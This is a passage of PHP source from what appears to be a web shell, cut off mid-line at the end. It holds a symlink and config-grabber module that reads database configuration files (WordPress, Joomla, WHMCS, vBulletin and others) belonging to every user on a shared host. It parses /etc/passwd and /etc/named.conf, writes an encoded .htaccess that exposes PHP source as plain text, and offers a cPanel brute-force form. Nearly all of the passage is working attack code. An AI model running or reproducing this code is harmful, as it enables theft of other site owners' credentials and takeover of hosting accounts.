2257 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2258 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2259 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2260 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2261 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2262 symlink('/home4/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2263 symlink('/home4/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2264 symlink('/home4/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2265 symlink('/home4/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2266 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2267 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2268 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2269 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2270 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2271 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2272 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2273 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2274 symlink('/home4/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2275 symlink('/home4/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2276 symlink('/home4/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2277 symlink('/home4/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2278 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2279 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2280 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2281 symlink('/home4/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2282 symlink('/home4/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2283 symlink('/home4/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2284 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2285 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2286 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2287 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2288 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2289 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2290 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2291 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2292 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2293 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2294 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2295 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2296 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2297 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2298 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2299 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2300 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2301 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2302 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2303 symlink('/home5/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2304 symlink('/home5/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2305 symlink('/home5/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2306 symlink('/home5/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2307 symlink('/home5/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2308 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2309 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2310 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2311 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2312 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2313 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2314 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2315 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2316 symlink('/home5/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2317 symlink('/home5/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2318 symlink('/home5/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2319 symlink('/home5/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2320 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2321 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2322 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2323 symlink('/home5/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2324 symlink('/home5/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2325 symlink('/home5/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2326 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2327 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2328 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2329 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2330 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2331 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2332 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2333 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2334 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2335 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2336 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2337 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2338 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2339 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2340 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2341 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2342 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2343 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2344 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2345 symlink('/home6/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2346 symlink('/home6/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2347 symlink('/home6/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2348 symlink('/home6/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2349 symlink('/home6/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2350 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2351 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2352 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2353 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2354 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2355 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2356 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2357 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2358 symlink('/home6/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2359 symlink('/home6/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2360 symlink('/home6/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2361 symlink('/home6/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2362 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2363 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2364 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2365 symlink('/home6/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2366 symlink('/home6/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2367 symlink('/home6/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2368 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2369 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2370 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2371 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2372 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2373 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2374 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2375 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2376 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2377 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2378 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2379 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2380 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2381 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2382 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2383 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2384 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2385 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2386 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2387 symlink('/home7/'.$usern.'/public_html/inc/config.php',$pdomain.'~~MyBB.txt');
2388 symlink('/home7/'.$usern.'/public_html/sites/default/settings.php',$pdomain.'~~Drupal.txt');
2389 symlink('/home7/'.$usern.'/public_html/includes/configure.php',$pdomain.'~~Oscommerce.txt');
2390 symlink('/home7/'.$usern.'/public_html/lib/config.php',$pdomain.'~~Balitbang.txt');
2391 symlink('/home7/'.$usern.'/public_html/config/koneksi.php',$pdomain.'~~Lokomedia.txt');
2392 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2393 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2394 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2395 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
2396 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2397 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2398 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2399 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2400 symlink('/home7/'.$usern.'/public_html/wp/wp-config.php',$pdomain.'~~Wordpress3.txt');
2401 symlink('/home7/'.$usern.'/public_html/home/wp-config.php',$pdomain.'~~Wordpress4.txt');
2402 symlink('/home7/'.$usern.'/public_html/main/wp-config.php',$pdomain.'~~Wordpress5.txt');
2403 symlink('/home7/'.$usern.'/public_html/site/wp-config.php',$pdomain.'~~Wordpress6.txt');
2404 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2405 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2406 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2407 symlink('/home7/'.$usern.'/public_html/main/configuration.php',$pdomain.'~~Joomla4.txt');
2408 symlink('/home7/'.$usern.'/public_html/home/configuration.php',$pdomain.'~~Joomla5.txt');
2409 symlink('/home7/'.$usern.'/public_html/site/configuration.php',$pdomain.'~~Joomla6.txt');
2410 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2411 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2412 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2413 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2414 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2415 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2416 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2417 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2418 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2419 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~Other1.txt');
2420 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~Other2.txt');
2421 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2422 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~Other3.txt');
2423 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~Other4.txt');
2424 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2425 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~Other5.txt');
2426 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2427 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2428 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2429 }
2430 $d0mains = @file("/etc/named.conf");
2431 if($d0mains)
2432 {
2433 mkdir($fn);
2434 chdir($fn);
2435 foreach($d0mains as $d0main)
2436 {
2437 if(eregi("zone",$d0main))
2438 {
2439 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2440 flush();
2441 if(strlen(trim($domains[1][0])) > 2)
2442 {
2443 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2444 syml($user['name'],$domains[1][0]);
2445 }
2446 }
2447 }
2448 echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:".$color[0].";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=".$_SERVER['PHP_SELF']." style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
2449 }
2450 else
2451 {
2452 mkdir($fn);
2453 chdir($fn);
2454 $temp = "";
2455 $val1 = 0;
2456 $val2 = 1000;
2457 for(;$val1 <= $val2;$val1++)
2458 {
2459 $uid = @posix_getpwuid($val1);
2460 if ($uid)
2461 $temp .= join(':',$uid)."\n";
2462 }
2463 echo '<br/>';
2464 $temp = trim($temp);
2465 $file5 = fopen("test.txt","w");
2466 fputs($file5,$temp);
2467 fclose($file5);
2468$htaccess =
2469'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
2470aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
2471biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
2472';
2473$file = fopen(".htaccess","w+");
2474$write = fwrite ($file ,base64_decode($htaccess));
2475
2476 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2477 while(!feof($file))
2478 {
2479 $s = fgets($file);
2480 $matches = array();
2481 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2482 $matches = str_replace("home/","",$matches[1]);
2483 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2484 continue;
2485 syml($matches,$matches);
2486 }
2487 fclose($file);
2488 echo "</table>";
2489 unlink("test.txt");
2490 echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:".$color[0].";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=".$_SERVER['PHP_SELF']." style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
2491 }
2492exit;
2493}
2494?>
2495<form method="POST" target="_blank">
2496<input name="page" type="hidden" value="find">
2497 <table width="550" cellpadding="3" cellspacing="1" align="center" style="border:3px solid #EB4949;" border=1>
2498 <tr>
2499 <td valign="top" colspan="6" style="border-bottom:2px solid #EB4949;padding:10px;"><center><span style="font-family: Verdana;font-size:30px;font-weight:bold;text-shadow: <?php echo $color[0]; ?> 0.0em 0.0em 0.2em;">D.A.C CPanel Bruteforce</span><br>
2500 </center></td>
2501 </tr>
2502 <tr>
2503 <td valign="top" style="width: 200px;"><span class="label">Safe Mode</span></td>
2504 <td valign="top" colspan="5"><span class="label">
2505<?php
2506$safe_mode = ini_get('safe_mode');
2507if($safe_mode=='1')
2508{
2509echo 'ON';
2510}else{
2511echo 'OFF';
2512}
2513?>
2514 </span>
2515 </td>
2516 </tr>
2517</form>
2518 <tr>
2519 <td valign="top"><span class="label">Disable Function</span></td>
2520 <td valign="top" colspan="5">
2521<form method="POST" target="?cp">
2522<input name="matikan" type="hidden" value="sekatan">
2523<?php
2524if(''==($func=@ini_get('disable_functions')))
2525{
2526echo "<font color='#EB4949' style='position:absolute;font-size:13px;'>No Security for Function</font>";
2527echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><font color="#EB4949" style="font-size:13px;">Success</font></td></tr>';
2528}else{
2529echo '<script>alert("\t Please See Below And Press \t \n \t --->| Click Here First! |<--- \t");</script>';
2530echo "<font color=#FF0000 style='position:relatif;font-size:13px;'>$func</font>";
2531echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><input type="submit" value="Click Here First!"></td></tr>';
2532}
2533?></form></td>
2534<form method="POST" target="?cp">
2535<input name="mendapatkan" type="hidden" value="passwd">
2536 <tr>
2537 <td valign="top"><span class="label">Get Config</span></td>
2538 <td valign="top"><input size="35" name="foldername" type="text" value="create_name_folder_config"> <input type="submit" value="Submit"></td>
2539 </td>
2540 </tr>
2541</form>
2542<form method="POST" target="_blank">
2543<input name="pass1" type="hidden" value="password">
2544 <tr>
2545 <td valign="top"><span class="label">Get Passlist</span></td>
2546 <td valign="top"><input size="35" name="url" type="text" value="url_of_config"> <input type="submit" value="Submit"></td>
2547 </td>
2548 </tr>
2549</form>
2550 <tr>
2551 <td valign="top">
2552 <span class="label">Userlist</span></td>
2553 <td valign="top" colspan="5"><textarea cols="40" rows="7" name="usernames"><?php system('ls /var/mail');?></textarea></td>
2554 </tr>
2555 <tr>
2556 <td valign="top">
2557 <span class="label">Passlist</span></td>
2558 <td valign="top"colspan="5"><textarea cols="40" rows="7" name="passwords"></textarea></td>
2559 </tr>
2560 <tr>
2561 <td valign="top">
2562 <span class="label">Type</span></td>
2563 <td valign="top" colspan="5">
2564 <input type="radio" name="type" value="simple" checked="checked"><span class="label">Simple</span>
2565 <input type="radio" name="type" value="passwd"><span class="label">/etc/passwd</span>
2566<input type="submit" value="Submit">
2567 </td>
2568 </tr>
2569</form>
2570
2571
2572</table>
2573</body>
2574</html>
2575<?php exit;
2576}
2577
2578
2579
2580
2581
2582function actionconfiggrab() {
2583 printHeader();
2584
2585 $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2586 $expld = explode('/',$furl );
2587 $burl =str_replace(end($expld),'',$furl);
2588 echo '<div class="content"><center>
2589 <h3>[ <a href="#" onclick="g(\'configgrab\',null,\'xdxd\',null)">Config Grabber[f-g-c]</a> ] -
2590[ <a href="#" onclick="g(\'configgrab\',null,\'xdxd2\',null)">Config Grabber[Perl]<sup style="color:red;text-decoration:blink;"></sup></a> ]';
2591
2592
2593 if(isset($_POST['p1']) && $_POST['p1']=='xdxd') { $User = $_POST['p1']; system('mkdir xd'); chmod('xd', 0777); if($User){ $users = file("/etc/passwd"); $lolx = array(); foreach ($users as $user) { $users = explode(":", $user); $lolx[] = $users[0]; } foreach ($lolx as $lol) { $space = "\n\n"."*"."\n"."*"."\n"."*"."\n\n"; if(file_exists('/home/'.$lol.'public_html/portal/configuration.php')){ $content = file_get_contents('/home/'.$lol.'public_html/portal/configuration.php'); $handle = fopen('xd/whm.txt', 'a'); fwrite($handle, $content.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/inc/config.php')){ $content1 = file_get_contents('/home/'.$lol.'/public_html/inc/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/sites/default/settings.php')) { $content2 = file_get_contents('/home/'.$lol.'/public_html/sites/default/settings.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content2.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/includes/configure.php')) { $content3 = file_get_contents('/home/'.$lol.'/public_html/includes/configure.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content3.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/lib/config.php')) { $content4 = file_get_contents('/home/'.$lol.'/public_html/lib/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content4.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/config/koneksi.php')) { $content5 = file_get_contents('/home/'.$lol.'/public_html/config/koneksi.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content5.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/vb/includes/config.php')) { $content6 = file_get_contents('/home/'.$lol.'/public_html/vb/includes/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content6.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/includes/config.php')) { $content7 = file_get_contents('/home/'.$lol.'/public_html/includes/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content7.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/forum/includes/config.php')) { $content8 = file_get_contents('/home/'.$lol.'/public_html/forum/includes/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content8.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/cc/includes/config.php')) { $content9 = file_get_contents('/home/'.$lol.'/public_html/cc/includes/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content9.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/config.php')) { $content10 = file_get_contents('/home/'.$lol.'/public_html/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content10.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/forum/includes/config.php')) { $content11 = file_get_contents('/home/'.$lol.'/public_html/forum/includes/config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content11.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/wp-config.php')) { $content12 = file_get_contents('/home/'.$lol.'/public_html/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content12.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/blog/wp-config.php')) { $content13 = file_get_contents('/home/'.$lol.'/public_html/blog/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content13.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/wp/wp-config.php')) { $content14 = file_get_contents('/home/'.$lol.'/public_html/wp/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content14.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/home/wp-config.php')) { $content15 = file_get_contents('/home/'.$lol.'/public_html/home/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content15.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/wp-config.php')) { $content16 = file_get_contents('/home/'.$lol.'/public_html/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content16.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/main/wp-config.php')) { $content17 = file_get_contents('/home/'.$lol.'/public_html/main/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content17.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/site/wp-config.php')) { $content18 = file_get_contents('/home/'.$lol.'/public_html/site/wp-config.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content18.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/configuration.php')) { $content19 = file_get_contents('/home/'.$lol.'/public_html/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content19.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/blog/configuration.php')) { $content20 = file_get_contents('/home/'.$lol.'/public_html/blog/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content20.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/joomla/configuration.php')) { $content21 = file_get_contents('/home/'.$lol.'/public_html/joomla/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content21.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/main/configuration.php')) { $content22 = file_get_contents('/home/'.$lol.'/public_html/main/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content22.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/home/configuration.php')) { $content23 = file_get_contents('/home/'.$lol.'/public_html/home/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content23.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/site/configuration.php')) { $content24 = file_get_contents('/home/'.$lol.'/public_html/site/configuration.php'); $handle = fopen('xd/config.txt', 'a'); fwrite($handle, $content24.$space); fclose($handle); } elseif (file_exists('/home/'.$lol.'/public_html/whm/configuration.php')) { $content25 = file_get_contents('/home/'.$lol.'/public_html/whm/configuration.php'); $handle = fopen('xd/config.txt', 